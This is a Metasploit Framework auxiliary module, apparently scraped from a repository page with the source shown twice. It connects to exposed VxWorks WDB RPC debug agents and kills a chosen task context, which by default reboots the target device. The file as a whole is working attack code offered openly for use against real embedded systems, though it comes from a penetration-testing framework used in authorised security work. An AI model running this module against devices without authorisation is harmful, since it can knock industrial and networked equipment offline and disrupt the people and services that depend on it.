metasploit-framework/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::WDBRPC_Client
	include Msf::Auxiliary::Report
	include Msf::Auxiliary::Scanner

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'VxWorks WDB Agent Remote Reboot',
			'Description'    => %q{
				This module provides the ability to reboot a VxWorks target through WDBRPC
			},
			'Author'         => [ 'hdm'],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['URL', 'http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html'],
					['URL', 'http://www.kb.cert.org/vuls/id/362332']
				],
			'Actions'     =>
				[
					['Reboot']
				],
			'DefaultAction' => 'Reboot'
			))

		register_options(
			[
				OptInt.new('CONTEXT', [ true, "The context to terminate (0=system reboot)", 0 ])
			], self.class)
	end

	def run_host(ip)

		wdbrpc_client_connect

		membase = @wdbrpc_info[:rt_membase]
		memsize = @wdbrpc_info[:rt_memsize]
		mtu     = @wdbrpc_info[:agent_mtu]
		ctx     = datastore['CONTEXT'].to_i

		print_status("#{ip} - Killing task context #{ctx}...")

		wdbrpc_client_context_kill( (ctx != 0) ? 3 : 0, ctx )

		print_status("#{ip} - Done")

		wdbrpc_client_disconnect
	end

end
Import the scanner and utility modules for the VxWorks WDB Agent service git-svn-id: file:///home/svn/framework3/trunk@9945 4d416f70-5f16-0410-b530-b9f4589650da 2010-08-02 05:56:26 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


			`require 'msf/core'`


			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::WDBRPC_Client`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::Scanner`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'VxWorks WDB Agent Remote Reboot',`
			`'Description' => %q{`
			`This module provides the ability to reboot a VxWorks target through WDBRPC`
			`},`
			`'Author' => [ 'hdm'],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`['URL', 'http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html'],`
			`['URL', 'http://www.kb.cert.org/vuls/id/362332']`
			`],`
			`'Actions' =>`
			`[`
			`['Reboot']`
			`],`
			`'DefaultAction' => 'Reboot'`
			`))`

			`register_options(`
			`[`
			`OptInt.new('CONTEXT', [ true, "The context to terminate (0=system reboot)", 0 ])`
			`], self.class)`
			`end`

			`def run_host(ip)`

			`wdbrpc_client_connect`

			`membase = @wdbrpc_info[:rt_membase]`
			`memsize = @wdbrpc_info[:rt_memsize]`
			`mtu = @wdbrpc_info[:agent_mtu]`
			`ctx = datastore['CONTEXT'].to_i`

			`print_status("#{ip} - Killing task context #{ctx}...")`

			`wdbrpc_client_context_kill( (ctx != 0) ? 3 : 0, ctx )`

			`print_status("#{ip} - Done")`

			`wdbrpc_client_disconnect`
			`end`

			`end`